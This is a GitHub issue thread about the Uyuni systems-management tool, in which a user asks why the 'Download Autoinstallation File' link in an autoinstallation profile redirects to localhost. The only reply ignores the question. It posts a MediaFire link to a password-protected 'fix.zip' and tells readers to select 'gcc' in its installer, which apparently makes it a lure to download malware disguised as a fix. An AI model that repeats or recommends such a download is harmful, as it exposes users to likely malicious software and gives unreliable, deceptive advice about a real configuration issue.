### ISSUE TITLE
Download Autoinstallation File

### ISSUE THREAD

**Issue by kalokja** [uyuni-project/uyuni#9223]
Hello, 

I would like to ask you, about the Autoinstallation profile

When I'm inside my Autoinstallation profile, and inside Autoinstallation File, and click on the link "Download Autoinstallation File" to see all snippets in one file, I'm redirected to localhost 

Is it some confiuration file, where I should set the right hostname to redirect? 

I'm running on Uyuni release 2024.07, Container based 

![image](https://github.com/user-attachments/assets/92f19536-798f-4fae-8bf7-2786160ab78b)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
